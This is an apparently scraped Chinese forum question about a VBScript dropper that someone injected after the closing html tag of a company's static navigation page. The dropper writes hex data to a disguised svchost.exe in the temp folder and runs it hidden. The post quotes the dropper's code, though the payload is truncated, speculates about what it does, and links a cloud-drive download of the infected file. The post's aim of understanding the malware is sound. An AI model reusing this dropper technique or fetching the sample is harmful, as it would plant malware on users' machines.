上海市建设安全协会 - 网站首页,做电锯电音的网站,群晖 6 wordpress,网站建设微金手指下拉12我在公司服务器上写了一个静态html#xff0c;方便导航#xff0c;结果没过多久发现html文件被修改了#xff0c;在/html标签后加了这些代码。
注#xff1a;WriteData 的内容很长#xff0c;被我删掉了很多#xff0c;不然没法提交这个提问
SCRIPT Lan…我在公司服务器上写了一个静态html方便导航结果没过多久发现html文件被修改了在/html标签后加了这些代码。
注WriteData 的内容很长被我删掉了很多不然没法提交这个提问
SCRIPT LanguageVBScript!--DropFileName svchost.exeWriteData 96E48656C705700000000000000000000Set FSO CreateObject(Scripting.FileSystemObject)DropPath FSO.GetSpecialFolder(2) \ DropFileNameIf FSO.FileExists(DropPath)False ThenSet FileObj FSO.CreateTextFile(DropPath, True)For i 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng(H Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell CreateObject(WScript.Shell)WSHshell.Run DropPath, 0//--/SCRIPT
这是看起来是黑客或者病毒植入的代码是要删除windows系统的svchost.exe让系统无法启动吗还是只是在临时文件夹下创建一个名为svchost.exe的文件windows系统也有一个同名的文件而且是个重要的程序给文件起这个名字显然是病毒做的伪装。然后会执行这个文件。
我觉得vbs好可怕居然可以在浏览器中操作文件系统把他们的病毒程序植入本地文件系统并执行vbs甚至可以不经用户同意删除文件如果把windows的必要文件删了windows系统直接死机启动不了。
和vbs比起来还是js安全一些。
原始html文件在这里感兴趣的自行下载
链接https://pan.baidu.com/s/1bMFxJpHdxL_dm9OrSet4_w
提取码psl6
